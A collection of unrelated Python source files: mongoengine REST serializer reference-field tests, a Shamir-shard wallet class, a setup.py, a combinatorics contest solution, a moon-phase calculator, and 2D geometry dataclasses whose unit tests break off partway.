# alpha=1., # transparency channel
# bgcolor='w', # background color
# bgalpha=.5, # background transparency
# )
# # X and Y are NxM matrices
# plt.plot(X, Y, # N plots
# '-', # style .-+xo
# colors=colors, # colors is a list of colors, one color for one line
# size=5, # size of points or markers only
# )
# plt.barplot(x, y, color='g') # LATER
# plt.axes(0., 0.) # LATER: display H/V data axes, going through that point
# plt.xlim(-1., 1.) # LATER
# plt.show() # data normalization happens here
|
from collections import OrderedDict
from django.test import TestCase
from mongoengine import Document, fields
from rest_framework.compat import unicode_repr
from rest_framework.fields import IntegerField
from rest_framework.serializers import Serializer
from rest_framework_mongoengine.fields import (
ComboReferenceField, GenericReferenceField, ReferenceField
)
from rest_framework_mongoengine.serializers import DocumentSerializer
from .utils import dedent
class ReferencedDoc(Document):
name = fields.StringField()
class IntReferencedDoc(Document):
id = fields.IntField(primary_key=True)
name = fields.StringField()
class OtherReferencedDoc(Document):
_meta = {
'collection': 'other_colection'
}
name = fields.StringField()
class IntReferenceField(ReferenceField):
pk_field_class = IntegerField
class IntGenericReferenceField(GenericReferenceField):
pk_field_class = IntegerField
class RefFieldsDoc(Document):
ref = fields.ReferenceField(ReferencedDoc)
dbref = fields.ReferenceField(ReferencedDoc, dbref=True)
cached = fields.CachedReferenceField(ReferencedDoc)
generic = fields.GenericReferenceField()
ref_list = fields.ListField(fields.ReferenceField(ReferencedDoc))
class ReferencingDoc(Document):
ref = fields.ReferenceField(ReferencedDoc)
class GenericReferencingDoc(Document):
ref = fields.GenericReferenceField()
class ReferencedSerializer(DocumentSerializer):
class Meta:
model = ReferencedDoc
class ListReferencingModel(Document):
refs = fields.ListField(ReferenceField(ReferencedDoc))
class RecursiveReferencingDoc(Document):
ref = fields.ReferenceField('self')
class TestReferenceField(TestCase):
def doCleanups(self):
ReferencedDoc.drop_collection()
IntReferencedDoc.drop_collection()
OtherReferencedDoc.drop_collection()
def test_init_with_model(self):
ReferenceField(ReferencedDoc)
def test_init_with_queryset(self):
ReferenceField(queryset=ReferencedDoc.objects.all())
def test_input(self):
field = ReferenceField(ReferencedDoc)
instance = ReferencedDoc.objects.create(name="foo")
ref = instance.to_dbref()
assert field.to_internal_value(str(instance.id)) == ref
assert field.to_internal_value({'_id': str(instance.id)}) == ref
def test_output(self):
field = ReferenceField(ReferencedDoc)
instance = ReferencedDoc.objects.create(name="foo")
strid = str(instance.id)
ref = instance.to_dbref()
assert field.to_representation(instance) == strid
assert field.to_representation(ref) == strid
def test_input_other(self):
field = ReferenceField(OtherReferencedDoc)
instance = OtherReferencedDoc.objects.create(name="foo")
ref = instance.to_dbref()
assert field.to_internal_value(str(instance.id)) == ref
assert field.to_internal_value({'_id': str(instance.id)}) == ref
def test_output_other(self):
field = ReferenceField(OtherReferencedDoc)
instance = OtherReferencedDoc.objects.create(name="foo")
strid = str(instance.id)
ref = instance.to_dbref()
assert field.to_representation(instance) == strid
assert field.to_representation(ref) == strid
def test_input_int(self):
field = IntReferenceField(IntReferencedDoc)
instance = IntReferencedDoc.objects.create(id=1, name="foo")
ref = instance.to_dbref()
assert field.to_internal_value(instance.id) == ref
assert field.to_internal_value(str(instance.id)) == ref
assert field.to_internal_value({'_id': instance.id}) == ref
assert field.to_internal_value({'_id': str(instance.id)}) == ref
def test_output_int(self):
field = IntReferenceField(IntReferencedDoc)
instance = IntReferencedDoc.objects.create(id=1, name="foo")
intid = instance.id
ref = instance.to_dbref()
assert field.to_representation(instance) == intid
assert field.to_representation(ref) == intid
class TestGenericReferenceField(TestCase):
def doCleanups(self):
ReferencedDoc.drop_collection()
IntReferencedDoc.drop_collection()
OtherReferencedDoc.drop_collection()
def test_input(self):
field = GenericReferenceField()
instance = ReferencedDoc.objects.create(name="foo")
ref = instance.to_dbref()
value = field.to_internal_value({'_cls': 'ReferencedDoc', '_id': str(instance.id)})
assert value == ref
def test_output(self):
field = GenericReferenceField()
instance = ReferencedDoc.objects.create(name="foo")
ref = instance.to_dbref()
strid = str(instance.id)
assert field.to_representation(instance) == {'_cls': 'ReferencedDoc', '_id': strid}
assert field.to_representation(ref) == {'_cls': 'ReferencedDoc', '_id': strid}
def test_input_other(self):
field = GenericReferenceField()
instance = OtherReferencedDoc.objects.create(name="foo")
ref = instance.to_dbref()
assert field.to_internal_value({'_cls': 'OtherReferencedDoc', '_id': str(instance.id)}) == ref
def test_output_other(self):
field = GenericReferenceField()
instance = OtherReferencedDoc.objects.create(name="foo")
strid = str(instance.id)
ref = instance.to_dbref()
assert field.to_representation(instance) == {'_cls': 'OtherReferencedDoc', '_id': strid}
assert field.to_representation(ref) == {'_cls': 'OtherReferencedDoc', '_id': strid}
def test_input_int(self):
field = IntGenericReferenceField()
instance = IntReferencedDoc.objects.create(id=1, name="foo")
ref = instance.to_dbref()
assert field.to_internal_value({'_cls': 'IntReferencedDoc', '_id': instance.id}) == ref
assert field.to_internal_value({'_cls': 'IntReferencedDoc', '_id': str(instance.id)}) == ref
def test_output_int(self):
field = IntGenericReferenceField()
instance = IntReferencedDoc.objects.create(id=1, name="foo")
ref = instance.to_dbref()
assert field.to_representation(instance) == {'_cls': 'IntReferencedDoc', '_id': instance.id}
assert field.to_representation(ref) == {'_cls': 'IntReferencedDoc', '_id': instance.id}
class TestComboReferenceField(TestCase):
def doCleanups(self):
ReferencedDoc.drop_collection()
def test_input_ref(self):
field = ComboReferenceField(serializer=ReferencedSerializer)
instance = ReferencedDoc.objects.create(name="foo")
ref = instance.to_dbref()
assert field.to_internal_value(str(instance.id)) == ref
assert field.to_internal_value({'_id': str(instance.id)}) == ref
def test_input_data(self):
field = ComboReferenceField(serializer=ReferencedSerializer)
value = field.to_internal_value({'name': "Foo"})
assert isinstance(value, ReferencedDoc)
assert value.name == "Foo"
assert value.id is None
def test_output(self):
field = ComboReferenceField(serializer=ReferencedSerializer)
instance = ReferencedDoc.objects.create(name="foo")
strid = str(instance.id)
ref = instance.to_dbref()
assert field.to_representation(instance) == strid
assert field.to_representation(ref) == strid
class TestReferenceMapping(TestCase):
maxDiff = 1000
def test_references(self):
class TestSerializer(DocumentSerializer):
class Meta:
model = RefFieldsDoc
# order is broken
expected = dedent("""
TestSerializer():
id = ObjectIdField(read_only=True)
ref_list = ListField(child=ReferenceField(queryset=ReferencedDoc.objects, required=False), required=False)
ref = ReferenceField(queryset=ReferencedDoc.objects, required=False)
dbref = ReferenceField(queryset=ReferencedDoc.objects, required=False)
cached = ReferenceField(queryset=ReferencedDoc.objects, required=False)
generic = GenericReferenceField(required=False)
""")
assert unicode_repr(TestSerializer()) == expected
def test_shallow(self):
class TestSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
depth = 0
expected = dedent("""
TestSerializer():
id = ObjectIdField(read_only=True)
ref = ReferenceField(queryset=ReferencedDoc.objects, required=False)
""")
assert unicode_repr(TestSerializer()) == expected
def test_deep(self):
class TestSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
depth = 1
expected = dedent("""
TestSerializer():
id = ObjectIdField(read_only=True)
ref = NestedSerializer(read_only=True):
id = ObjectIdField(read_only=True)
name = CharField(required=False)
""")
assert unicode_repr(TestSerializer()) == expected
def test_recursive(self):
class TestSerializer(DocumentSerializer):
class Meta:
model = RecursiveReferencingDoc
depth = 3
expected = dedent("""
TestSerializer():
id = ObjectIdField(read_only=True)
ref = NestedSerializer(read_only=True):
id = ObjectIdField(read_only=True)
ref = NestedSerializer(read_only=True):
id = ObjectIdField(read_only=True)
ref = NestedSerializer(read_only=True):
id = ObjectIdField(read_only=True)
ref = ReferenceField(queryset=RecursiveReferencingDoc.objects, required=False)
""")
assert unicode_repr(TestSerializer()) == expected
def test_custom_field(self):
class CustomReferencing(ReferenceField):
pass
class TestSerializer(DocumentSerializer):
serializer_reference_field = CustomReferencing
class Meta:
model = ReferencingDoc
depth = 0
expected = dedent("""
TestSerializer():
id = ObjectIdField(read_only=True)
ref = CustomReferencing(queryset=ReferencedDoc.objects, required=False)
""")
assert unicode_repr(TestSerializer()) == expected
def test_custom_generic(self):
class CustomReferencing(GenericReferenceField):
pass
class TestSerializer(DocumentSerializer):
serializer_reference_generic = CustomReferencing
class Meta:
model = GenericReferencingDoc
depth = 0
expected = dedent("""
TestSerializer():
id = ObjectIdField(read_only=True)
ref = CustomReferencing(required=False)
""")
assert unicode_repr(TestSerializer()) == expected
def test_custom_nested(self):
class CustomReferencing(Serializer):
foo = IntegerField()
class TestSerializer(DocumentSerializer):
serializer_reference_nested = CustomReferencing
class Meta:
model = ReferencingDoc
depth = 1
expected = dedent("""
TestSerializer():
id = ObjectIdField(read_only=True)
ref = NestedSerializer(read_only=True):
foo = IntegerField()
""")
assert unicode_repr(TestSerializer()) == expected
class DisplayableReferencedModel(Document):
name = fields.StringField()
def __str__(self):
return '%s Color' % (self.name)
class DisplayableReferencingModel(Document):
color = fields.ReferenceField(DisplayableReferencedModel)
class TestRelationalFieldDisplayValue(TestCase):
def setUp(self):
self.objects = [
DisplayableReferencedModel.objects.create(name='Red'),
DisplayableReferencedModel.objects.create(name='Green'),
DisplayableReferencedModel.objects.create(name='Blue')
]
self.ids = list(map(lambda e: str(e.id), self.objects))
def doCleanups(self):
DisplayableReferencedModel.drop_collection()
def test_default_display_value(self):
class TestSerializer(DocumentSerializer):
class Meta:
model = DisplayableReferencingModel
serializer = TestSerializer()
expected = OrderedDict([(self.ids[0], 'Red Color'),
(self.ids[1], 'Green Color'),
(self.ids[2], 'Blue Color')])
assert serializer.fields['color'].choices == expected
def test_custom_display_value(self):
class TestField(ReferenceField):
def display_value(self, instance):
return 'My %s Color' % (instance.name)
class TestSerializer(DocumentSerializer):
color = TestField(queryset=DisplayableReferencedModel.objects.all())
class Meta:
model = DisplayableReferencingModel
serializer = TestSerializer()
expected = OrderedDict([(self.ids[0], 'My Red Color'),
(self.ids[1], 'My Green Color'),
(self.ids[2], 'My Blue Color')])
assert serializer.fields['color'].choices == expected
class TestReferenceIntegration(TestCase):
def setUp(self):
self.target = ReferencedDoc.objects.create(
name='Foo'
)
def doCleanups(self):
ReferencedDoc.drop_collection()
ReferencingDoc.drop_collection()
def test_retrieval(self):
instance = ReferencingDoc.objects.create(ref=self.target)
class TestSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
depth = 0
serializer = TestSerializer(instance)
expected = {
'id': str(instance.id),
'ref': str(self.target.id),
}
assert serializer.data == expected
def test_retrieval_deep(self):
instance = ReferencingDoc.objects.create(ref=self.target)
class TestSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
depth = 1
serializer = TestSerializer(instance)
expected = {
'id': str(instance.id),
'ref': {'id': str(self.target.id), 'name': "Foo"}
}
assert serializer.data == expected
def test_create(self):
class TestSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
new_target = ReferencedDoc.objects.create(name="Bar")
data = {'ref': new_target.id}
serializer = TestSerializer(data=data)
assert serializer.is_valid(), serializer.errors
instance = serializer.save()
assert instance.ref.id == new_target.id
expected = {
'id': str(instance.id),
'ref': str(new_target.id)
}
assert serializer.data == expected
def test_update(self):
instance = ReferencingDoc.objects.create(ref=self.target)
class TestSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
new_target = ReferencedDoc.objects.create(
name="Bar"
)
data = {
'ref': new_target.id
}
# Serializer should validate okay.
serializer = TestSerializer(instance, data=data)
assert serializer.is_valid(), serializer.errors
# Creating the instance, relationship attributes should be set.
instance = serializer.save()
assert instance.ref.id == new_target.id
# Representation should be correct.
expected = {
'id': str(instance.id),
'ref': str(new_target.id)
}
assert serializer.data == expected
class TestGenericReferenceIntegration(TestCase):
def setUp(self):
self.target = ReferencedDoc.objects.create(name='Foo')
def doCleanups(self):
ReferencedDoc.drop_collection()
GenericReferencingDoc.drop_collection()
def test_retrieval(self):
instance = GenericReferencingDoc.objects.create(ref=self.target)
class TestSerializer(DocumentSerializer):
class Meta:
model = GenericReferencingDoc
depth = 0
serializer = TestSerializer(instance)
expected = {
'id': str(instance.id),
'ref': {'_cls': 'ReferencedDoc', '_id': str(self.target.id)},
}
assert serializer.data == expected
def test_retrieval_deep(self):
instance = GenericReferencingDoc.objects.create(ref=self.target)
class TestSerializer(DocumentSerializer):
class Meta:
model = GenericReferencingDoc
depth = 1
serializer = TestSerializer(instance)
expected = {
'id': str(instance.id),
'ref': {'_cls': 'ReferencedDoc', '_id': str(self.target.id)},
}
assert serializer.data == expected
def test_create(self):
class TestSerializer(DocumentSerializer):
class Meta:
model = GenericReferencingDoc
new_target = ReferencedDoc.objects.create(
name="Bar"
)
data = {
'ref': {'_cls': 'ReferencedDoc', '_id': new_target.id}
}
serializer = TestSerializer(data=data)
assert serializer.is_valid(), serializer.errors
instance = serializer.save()
assert instance.ref == new_target.to_dbref()
expected = {
'id': str(instance.id),
'ref': {'_cls': 'ReferencedDoc', '_id': str(new_target.id)}
}
assert serializer.data == expected
def test_update(self):
instance = GenericReferencingDoc.objects.create(ref=self.target)
class TestSerializer(DocumentSerializer):
class Meta:
model = GenericReferencingDoc
new_target = OtherReferencedDoc.objects.create(name="Bar")
data = {
'ref': {'_cls': 'OtherReferencedDoc', '_id': new_target.id}
}
# Serializer should validate okay.
serializer = TestSerializer(instance, data=data)
assert serializer.is_valid(), serializer.errors
# Creating the instance, relationship attributes should be set.
instance = serializer.save()
assert instance.ref == new_target.to_dbref()
# Representation should be correct.
expected = {
'id': str(instance.id),
'ref': {'_cls': 'OtherReferencedDoc', '_id': str(new_target.id)}
}
assert serializer.data == expected
class ComboReferencingSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
ref = ComboReferenceField(serializer=ReferencedSerializer)
def save_subdocs(self, validated_data):
doc = validated_data['ref']
if isinstance(doc, Document):
doc.save()
def create(self, validated_data):
self.save_subdocs(validated_data)
return super(ComboReferencingSerializer, self).create(validated_data)
def update(self, instance, validated_data):
self.save_subdocs(validated_data)
return super(ComboReferencingSerializer, self).update(instance, validated_data)
class TestComboReferenceIntegration(TestCase):
def setUp(self):
self.target = ReferencedDoc.objects.create(name='Foo')
def doCleanups(self):
ReferencedDoc.drop_collection()
ReferencingDoc.drop_collection()
def test_retrieval(self):
instance = ReferencingDoc.objects.create(ref=self.target)
serializer = ComboReferencingSerializer(instance)
expected = {
'id': str(instance.id),
'ref': str(self.target.id),
}
assert serializer.data == expected
def test_retrieval_deep(self):
instance = ReferencingDoc.objects.create(ref=self.target)
class TestSerializer(DocumentSerializer):
class Meta:
model = ReferencingDoc
depth = 1
ref = ComboReferenceField(serializer=ReferencedSerializer)
serializer = TestSerializer(instance)
expected = {
'id': str(instance.id),
'ref': {'id': str(self.target.id), 'name': "Foo"}
}
assert serializer.data == expected
def test_create_ref(self):
new_target = ReferencedDoc.objects.create(name="Bar")
data = {'ref': new_target.id}
serializer = ComboReferencingSerializer(data=data)
assert serializer.is_valid(), serializer.errors
instance = serializer.save()
assert instance.ref.id == new_target.id
expected = {
'id': str(instance.id),
'ref': str(new_target.id)
}
assert serializer.data == expected
def test_create_data(self):
data = {'ref': {'name': "Bar"}}
serializer = ComboReferencingSerializer(data=data)
assert serializer.is_valid(), serializer.errors
instance = serializer.save()
new_target = ReferencedDoc.objects.get(name="Bar")
assert instance.ref.id == new_target.id
expected = {
'id': str(instance.id),
'ref': str(new_target.id)
}
assert serializer.data == expected
def test_update_ref(self):
instance = ReferencingDoc.objects.create(ref=self.target)
new_target = ReferencedDoc.objects.create(name="Bar")
data = {'ref': new_target.id}
serializer = ComboReferencingSerializer(instance, data=data)
assert serializer.is_valid(), serializer.errors
instance = serializer.save()
assert instance.ref.id == new_target.id
expected = {
'id': str(instance.id),
'ref': str(new_target.id)
}
assert serializer.data == expected
def test_update_data(self):
instance = ReferencingDoc.objects.create(ref=self.target)
data = {'ref': {'name': "Bar"}}
serializer = ComboReferencingSerializer(instance, data=data)
assert serializer.is_valid(), serializer.errors
instance = serializer.save()
new_target = ReferencedDoc.objects.get(name="Bar")
assert instance.ref.id == new_target.id
expected = {
'id': str(instance.id),
'ref': str(new_target.id)
}
assert serializer.data == expected
|
from typing import List, Optional, Tuple
import bson
from hermit import shamir_share
from .interface import ShardWordUserInterface
class Shard(object):
"""Represents a single Shamir shard.
"""
@property
def encrypted_mnemonic(self):
"""
The encrypted mnemonic words representing this shard
"""
return self._encrypted_mnemonic
@encrypted_mnemonic.setter
def encrypted_mnemonic(self, words):
self._encrypted_mnemonic = words
self._share_id = None
@property
def share_id(self):
"""
An integer representing the share family that this shard belongs to.
"""
if self._share_id is None:
self._unpack_share()
return self._share_id
@property
def shard_id(self):
"""
A pair of integers representing the group index and the member index of
this shard
"""
if self._group_id is None:
self._unpack_share()
return (self._group_id, self._member_id)
def __init__(self,
name: str,
encrypted_mnemonic: Optional[str],
interface: ShardWordUserInterface = None,
) -> None:
"""Creates a WalletWordsShard instance
:param name: the name of the shard
:param encrypted_mnemonic: the encrypted form of the mnemonic words for the share
:param interface (optional): the interface used to communicate
with the user about shard information. If none is given, the
default WalletWordUserInterface is used.
"""
self.name = name
self._encrypted_mnemonic = encrypted_mnemonic
self._share_id = None
self._group_id = None
self._member_id = None
if interface is None:
self.interface = ShardWordUserInterface()
else:
self.interface = interface
def input(self) -> None:
"""Input this shard's data from a SLIP39 phrase"""
words = self.interface.enter_shard_words(self.name)
shamir_share.decode_mnemonic(words)
self.encrypted_mnemonic = words
def words(self) -> List[str]:
"""Returns the (decrypted) SLIP39 phrase for this shard"""
return shamir_share.decrypt_mnemonic(self.encrypted_mnemonic, self._get_password())
def change_password(self):
"""Decrypt and re-encrypt this shard with a new password"""
old_password, new_password = self._get_change_password()
self.encrypted_mnemonic = shamir_share.reencrypt_mnemonic(
self.encrypted_mnemonic, old_password, new_password)
self.encrypted_shard = shamir_share.decode_mnemonic(
self.encrypted_mnemonic)
def from_bytes(self, bytes_data: bytes) -> None:
"""Initialize shard from the given bytes"""
self.encrypted_mnemonic = shamir_share.mnemonic_from_bytes(bytes_data)
self.encrypted_shard = shamir_share.decode_mnemonic(
self.encrypted_mnemonic)
def to_bytes(self) -> bytes:
"""Serialize this shard to bytes"""
return shamir_share.mnemonic_to_bytes(self.encrypted_mnemonic)
def to_qr_bson(self) -> bytes:
"""Serialize this shard as BSON, suitable for a QR code"""
return bson.dumps({self.name: self.to_bytes()})
def _unpack_share(self) -> None:
(self._share_id, _, self._group_id, _, _, self._member_id, _,
_) = shamir_share.decode_mnemonic(self.encrypted_mnemonic)
def to_str(self) -> str:
"""Return a user friendly string describing this shard and its membership in a group"""
(identifier, _, group_index, _, _, member_identifier, _,
_) = shamir_share.decode_mnemonic(self.encrypted_mnemonic)
return "{0} (family:{1} group:{2} member:{3})".format(self.name, identifier, group_index + 1, member_identifier + 1)
def _get_password(self) -> bytes:
"""Prompt the user for this shard's password"""
return self.interface.get_password(self.to_str())
def _get_change_password(self) -> Tuple[bytes, bytes]:
return self.interface.get_change_password(self.to_str())
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="dasm",
version="0.0.1",
author="Drazisil",
author_email="me@drazisil.com",
description="A small example package",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/drazisil/dasm",
package_dir={'': 'src'},
packages=setuptools.find_packages("src"),
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
entry_points='''
[console_scripts]
dasm=dasm:_main
''',
)
|
# -*- coding: utf-8 -*-
def main():
import sys
input = sys.stdin.readline
a, b, k = map(int, input().split())
size = 61
c = [[0 for _ in range(size)] for _ in range(size)]
c[0][0] = 1
# nCrを前計算
for i in range(60):
for j in range(i + 1):
c[i + 1][j] += c[i][j]
c[i + 1][j + 1] += c[i][j]
ans = ""
while a + b > 0:
x = 0 # 先頭の文字を固定したときの組み合わせの数
if a >= 1:
x = c[a - 1 + b][a - 1]
if k <= x:
ans += "a"
a -= 1
else:
ans += "b"
b -= 1
k -= x # インデックスの補正
print(ans)
if __name__ == "__main__":
main()
|
#start 7 objectSwarmObserverTkBugs.py
import ObserverSwarmTk
observerSwarmTk = ObserverSwarmTk.ObserverSwarmTk()
# create objects
observerSwarmTk.buildObjects()
# create actions
observerSwarmTk.buildActions()
# run
observerSwarmTk.mainloop()
#finishing
observerSwarmTk.destroy()
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
'''
moonphase.py - Calculate Lunar Phase
Author: Sean B. Palmer, inamidst.com
Cf. http://en.wikipedia.org/wiki/Lunar_phase#Lunar_phase_calculation
'''
from comun import _
import math
import decimal
import datetime
dec = decimal.Decimal
class Moon(object):
def __init__(self, date):
self.date = date
def position(self):
diff = self.date - datetime.datetime(2001, 1, 1)
days = dec(diff.days) + (dec(diff.seconds) / dec(86400))
lunations = dec('0.20439731') + (days * dec('0.03386319269'))
return lunations % dec(1)
def phase(self):
pos = self.position()
index = (pos * dec(8)) + dec('0.5')
index = math.floor(index)
return {
0: _('New Moon'),
1: _('Waxing Crescent'),
2: _('First Quarter'),
3: _('Waxing Gibbous'),
4: _('Full Moon'),
5: _('Waning Gibbous'),
6: _('Last Quarter'),
7: _('Waning Crescent')
}[int(index) & 7]
def phase_int(self):
pos = self.position()
index = (pos * dec(8)) + dec('0.5')
index = math.floor(index)
return int(index) & 7
def icon(self):
pos = self.position()
index = (pos * dec(28)) + dec('0.5')
index = int(math.floor(index))
index = str(index)
if len(index) < 2:
index = '0' + index
return 'mwi-moon' + index + '.png'
def image(self):
pos = self.position()
index = (pos * dec(28)) + dec('0.5')
index = int(math.floor(index))
index = str(index)
if len(index) < 2:
index = '0' + index
return 'mwi-moon' + index + '.svg'
if __name__ == '__main__':
y = 2030
m = 3
days = 31
for i in range(1, days):
moon = Moon(datetime.datetime(y, m, i))
phasename = moon.phase()
roundedpos = round(float(moon.position()), 3)
print('dia %s -> %s (%s): %s' % (i, phasename,
roundedpos, moon.icon()))
exit(0)
|
# -*- coding: utf-8 -*-
from __future__ import annotations
from dataclasses import dataclass
from typing import Tuple
@dataclass
class Size:
"""A height and width in 2-dimensional space.
Attributes
----------
cx : int
The width component of the Size.
cy : int
The height component of the Size.
Methods
-------
__add__
"""
cx: int = 0
cy: int = 0
def __add__(self, other: Size) -> Size:
"""Return the sum of two sizes."""
return Size(self.cx + other.cx, self.cy + other.cy)
def __sub__(self, other: Size) -> Size:
"""Return the difference of two sizes."""
return Size(self.cx - other.cx, self.cy - other.cy)
@dataclass
class Point:
"""A point in 2-dimensional space."""
x: int = 0
y: int = 0
def offset(self, x_offset: int, y_offset: int):
"""Offset the point by the given values."""
self.x += x_offset
self.y += y_offset
def __sub__(self, rhs):
"""Return the difference of two points."""
return Point(self.x - rhs.x, self.y - rhs.y)
def __add__(self, rhs):
"""Return the sum of two points."""
return Point(self.x + rhs.x, self.y + rhs.y)
def manhattan_distance(self, other) -> int:
"""Calculate the Manhattan distance between `self` and `other`."""
return abs(self.x - other.x) + abs(self.y - other.y)
@dataclass
class Rectangle:
"""A rectangle in 2-dimensional space."""
left: int = 0
top: int = 0
right: int = 0
bottom: int = 0
def bottom_right(self) -> Point:
"""Return the bottom-right point of the rectangle."""
return Point(self.right, self.bottom)
def center_point(self) -> Point:
"""Return the center point of the rectangle."""
return Point(self.left + (self.width() // 2), self.top + (self.height() // 2))
def width(self) -> int:
"""Return the width of the rectangle."""
return self.right - self.left
def height(self) -> int:
"""Return the height of the rectangle."""
return self.bottom - self.top
def deflate(self, cx: int, cy: int) -> None:
"""Deflate the rectangle by moving the sides towards the center."""
self.left += cx
self.top += cy
self.right -= cx
self.bottom -= cy
def deflate_rect(self, rhs) -> None:
"""Deflate the rectangle by moving the sides towards the center."""
self.left += rhs.left
self.top += rhs.top
self.right -= rhs.right
self.bottom -= rhs.bottom
def inflate(self, cx: int, cy: int) -> None:
"""Inflate the rectangle by moving the sides away from the center."""
self.left -= cx
self.top -= cy
self.right += cx
self.bottom += cy
def inflate_rect(self, rhs) -> None:
"""Inflate the rectangle by moving the sides away from the center."""
self.left -= rhs.left
self.top -= rhs.top
self.right += rhs.right
self.bottom += rhs.bottom
def intersect(self, other):
"""Create a rectangle equal to the intersection of the given rectangles."""
return Rectangle(
max(self.left, other.left),
max(self.top, other.top),
min(self.right, other.right),
min(self.bottom, other.bottom),
)
def is_empty(self) -> bool:
"""Return True if the rectangle height and or width are <= 0."""
return self.height() <= 0 or self.width() <= 0
def is_null(self) -> bool:
"""Return True if all values in the rectangle are 0."""
return self.left == 0 and self.top == 0 and self.right == 0 and self.bottom == 0
def move_to_x(self, x: int) -> None:
"""Move the rectangle to the absolute coordinate specified by x."""
self.right = self.width() + x
self.left = x
def move_to_y(self, y: int) -> None:
"""Move the rectangle to the absolute coordinate specified by y."""
self.bottom = self.height() + y
self.top = y
def move_to_xy(self, x: int, y: int) -> None:
"""Move the rectangle to the absolute x- and y- coordinates specified."""
self.move_to_x(x)
self.move_to_y(y)
def normalize(self) -> None:
"""Normalizes the rectangle so both the height and the width are positive."""
if self.left > self.right:
self.left, self.right = self.right, self.left
if self.top > self.bottom:
self.top, self.bottom = self.bottom, self.top
def offset(self, x_offset: int, y_offset: int) -> None:
"""Offset the point by the given values."""
self.left += x_offset
self.top += y_offset
self.right += x_offset
self.bottom += y_offset
def __add__(self, rhs):
"""Displace the rectangle by the specified offsets."""
new_rect = self
if isinstance(rhs, Point):
new_rect.left += rhs.x
new_rect.top += rhs.y
new_rect.right += rhs.x
new_rect.bottom += rhs.y
elif isinstance(rhs, Rectangle):
new_rect.left += rhs.left
new_rect.top += rhs.top
new_rect.right += rhs.right
new_rect.bottom += rhs.bottom
else:
raise TypeError("rhs must be a Point or a Rect.")
return new_rect
def __sub__(self, rhs):
"""Displace the rectangle by the specified offsets."""
new_rect = self
if isinstance(rhs, Point):
new_rect.left -= rhs.x
new_rect.top -= rhs.y
new_rect.right -= rhs.x
new_rect.bottom -= rhs.y
elif isinstance(rhs, Rectangle):
new_rect.left -= rhs.left
new_rect.top -= rhs.top
new_rect.right -= rhs.right
new_rect.bottom -= rhs.bottom
else:
raise TypeError("rhs must be a Point or a Rect.")
return new_rect
def pt_in_rect(self, point: Point) -> bool:
"""Returns True if the given point is inside the rectangle."""
return (
self.left <= point.x
and self.right >= point.x # noqa: W503
and self.top <= point.y # noqa: W503
and self.bottom >= point.y # noqa: W503
)
def set(self, left: int, top: int, right: int, bottom: int) -> None:
"""Set the dimension of the rectangle."""
self.left = left
self.top = top
self.right = right
self.bottom = bottom
def set_empty(self) -> None:
"""Make a null rectangle by setting all coordinates to zero."""
self.left = 0
self.top = 0
self.right = 0
self.bottom = 0
def size(self) -> Size:
"""Get a Size object representing the width and height of the rectangle."""
return Size(self.width(), self.height())
# def subtract_rect(lhs, rhs):
# """Create a rectangle with dimensions equal to the subtraction of lhs from rhs."""
# return Rectangle()
def top_left(self) -> Point:
"""Return the top-left point of the rectangle."""
return Point(self.left, self.top)
def union(self, other):
"""Make a rectangle that is a union of the two given rectangles."""
return Rectangle(
min(self.left, other.left),
min(self.top, other.top),
max(self.right, other.right),
max(self.bottom, other.bottom),
)
def manhattan_distance(a: Tuple[int, int], b: Tuple[int, int]) -> int:
"""Return the Manhattan distance between two points."""
return abs(a[0] - b[0]) + abs(a[1] - b[1])
if __name__ == "__main__":
import unittest
class PointUnitTests(unittest.TestCase):
def test_constructor(self):
default = Point()
self.assertEqual(default.x, 0)
self.assertEqual(default.y, 0)
default = Point(y=25, x=10)
self.assertEqual(default.x, 10)
self.assertEqual(default.y, 25)
def test_offset(self):
x = Point(100, 100)
x.offset(35, 35)
self.assertEqual(x, Point(135, 135))
x = Point(100, 100)
x.offset(-25, -50)
self.assertEqual(x, Point(75, 50))
def test_operator_eq(self):
x = Point(256, 128)
y = Point(256, 128)
self.assertTrue(x == y)
self.assertFalse(x is y)
def test_operator_neq(self):
x = Point(256, 128)
y = Point(1024, 4096)
self.assertTrue(x != y)
def test_operator_add_eq(self):
x = Point(100, 100)
y = Point(35, 35)
x += y
self.assertEqual(x, Point(135, 135))
self.assertEqual(y, Point(35, 35))
def test_operator_sub_eq(self):
x = Point(100, 100)
y = Point(35, 35)
x -= y
self.assertEqual(x, Point(65, 65))
self.assertEqual(y, Point(35, 35))
def test_operator_add(self):
x = Point(100, 100)
y = Point(35, 35)
z = x + y
self.assertEqual(z, Point(135, 135))
self.assertEqual(x, Point(100, 100))
self.assertEqual(y, Point(35, 35))
def test_operator_sub(self):
x = Point(100, 100)
y = Point(35, 35)
z = x - y
self.assertEqual(z, Point(65, 65))
self.assertEqual(x, Point(100, 100))
self.assertEqual(y, Point(35, 35))
class RectangleUnitTests(unittest.TestCase):
def test_constructor(self):
rc = Rectangle()
self.assertEqual(rc.left, 0)
self.assertEqual(rc.top, 0)
self.assertEqual(rc.right, 0)
self.assertEqual(rc.bottom, 0)
rc = Rectangle(top=10, bottom=100, right=128, left=16)
self.assertEqual(rc.left, 16)
self.assertEqual(rc.top, 10)
self.assertEqual(rc.right, 128)
self.assertEqual(rc.bottom, 100)
def test_operator_assign(self):
x = Rectangle(0, 0, 127, 128)
y = x
self.assertEqual(y, Rectangle(0, 0, 127, 128))
def test_operator_eq(self):
x = Rectangle(35, 150, 10, 25)
y = Rectangle(35, 150, 10, 25)
z = Rectangle(98, 999, 6, 3)
self.assertTrue(x == y)
self.assertFalse(x is y)
self.assertFalse(x == z)
def test_operator_not_eq(self):
x = Rectangle(35, 150, 10, 25)
y = Rectangle(35, 150, 10, 25)
z = Rectangle(98, 999, 6, 3)
self.assertFalse(x != y)
self.assertFalse(x is y)
self.assertTrue(x != z)
def test_operator_add(self):
x = Rectangle(100, 235, 200, 335)
y = x + Point(35, 65)
self.assertEqual(y, Rectangle(135, 300, 235, 400))
x = Rectangle(100, 235, 200, 335)
